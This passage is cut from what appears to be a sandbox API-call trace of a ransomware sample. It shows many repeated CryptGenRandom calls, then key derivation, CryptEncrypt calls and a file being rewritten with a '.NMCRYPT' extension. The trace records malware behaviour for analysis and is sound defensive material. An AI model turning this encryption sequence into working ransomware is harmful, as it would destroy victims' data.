out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.762] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.763] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.764] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.765] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.766] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.766] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0147.766] CryptHashData (hHash=0x9ad138, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.766] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad1b8) returned 1 [0147.766] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.766] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.766] wcslen (_String="\\\\?\\") returned 0x4 [0147.766] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad738) returned 1 [0147.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.767] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2246) returned 1 [0147.767] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.767] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.768] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, 